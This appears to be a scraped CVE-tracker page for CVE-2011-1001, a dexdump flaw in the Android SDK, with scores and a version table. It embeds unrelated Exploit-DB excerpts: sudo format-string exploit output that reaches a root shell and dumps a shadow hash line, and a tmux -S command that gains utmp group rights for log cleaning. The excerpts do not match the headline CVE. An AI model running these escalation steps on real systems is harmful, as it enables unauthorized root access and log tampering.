CVE-2011-1001
published 2011-07-08CVE-2011-1001: dexdump in Android SDK before 2.3 does not properly perform structural verification, which allows user-assisted remote attackers to cause a denial of service…
PriorityP419medium4.3CVSS 2.0
AVNACMAuNCNINAP
EPSS
1.23%
65.4th percentile
dexdump in Android SDK before 2.3 does not properly perform structural verification, which allows user-assisted remote attackers to cause a denial of service (dexdump crash) and possibly execute arbitrary code via a malformed APK or dex file that calls a method using more arguments than the number of register that have been declared for that method.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| android_sdk | <= 2.2 | — | |
| android_sdk | — | — | |
| android_sdk | — | — | |
| android_sdk | — | — | |
| android_sdk | — | — | |
| android_sdk | — | — | |
| android_sdk | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
sudo 1.8.0 < 1.8.3p1 - 'sudo_debug' glibc FORTIFY_SOURCE Bypass + Privilege Escalation
exploitdb·2013-05-01·CVSS 7.2
CVE-2012-0809 [HIGH] sudo 1.8.0 < 1.8.3p1 - 'sudo_debug' glibc FORTIFY_SOURCE Bypass + Privilege Escalation
sudo 1.8.0
A�AF@ F@ F@ F@ F@ ' from LD_PRELOAD cannot be preloaded: ignored.
%1073825311%21372736 %: settings:
=
%1073825311%21372736 %: settings:
=
%1073825311%21372736 %: sudo_mode 1081383169
Sorry, try again.
Sorry, try again.
Sorry, try again.
%20$08n %*482$ %*2850$ %1073741824$: 3 incorrect password attempts
%1073886251%21372736 %: policy plugin returns 1081402445
[+] Getting root..!
[+] Cleaning system.
[+] Launching root shell!
sh-4.2# id; uname -a
uid=0(root) gid=1001(aeon) groups=0(root),1001(aeon) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
Linux localhost.localdomain 3.1.0-7.fc16.i686.PAE #1 SMP Tue Nov 1 20:53:45 UTC 2011 i686 i686 i386 GNU/Linux
sh-4.2# head -n1 /etc/shadow
root:$6$YxDB.SNvtnqhtt.T$slIOJSl7Lz07PtDF23m1G0evZH4MXvpo1VNebUUasM/je2sP6FXi2
Exploit-DB
tmux 1.3/1.4 - '-S' Option Incorrect SetGID Privilege Escalation
exploitdb·2011-04-11·CVSS 4.6
CVE-2011-1496 [MEDIUM] tmux 1.3/1.4 - '-S' Option Incorrect SetGID Privilege Escalation
tmux 1.3/1.4 - '-S' Option Incorrect SetGID Privilege Escalation
---
| Team ph0x90bic proudly presents |
| tmux -S 1.3/1.4 local utmp exploit |
# Exploit Title: tmux '-S' Option Incorrect SetGID Local Privilege Escalation Vulnerability
# Date: 11.04.2011
# Author: ph0x90bic
# Software Link: http://tmux.sourceforge.net/
# Version: 1.3/1.4
# Tested on: Linux debian 2.6.26-1-686
# CVE : CVE-2011-1496
---
INTRODUCTION
tmux 1.3/1.4 contains a privilege escalation vulnerabillity,
which gives you utmp group privileges. This bug is important,
because it is possible to clean logfiles and use logcleaners
for btmp, wtmp and lastlog without local root access.
---
EXPLOIT
Execute shell as utmp group
$ tmux -S /tmp/.whateveryouwant -c id
uid=1001(company) gid=1001(company) egid=43(utmp), group
http://android.git.kernel.org/?p=platform/dalvik.git%3Ba=commit%3Bh=4b0750e8df91220690bb417f45d7ae8b7851b220http://seclists.org/fulldisclosure/2011/Mar/329http://android.git.kernel.org/?p=platform/dalvik.git%3Ba=commit%3Bh=4b0750e8df91220690bb417f45d7ae8b7851b220http://seclists.org/fulldisclosure/2011/Mar/329
2011-07-08
Published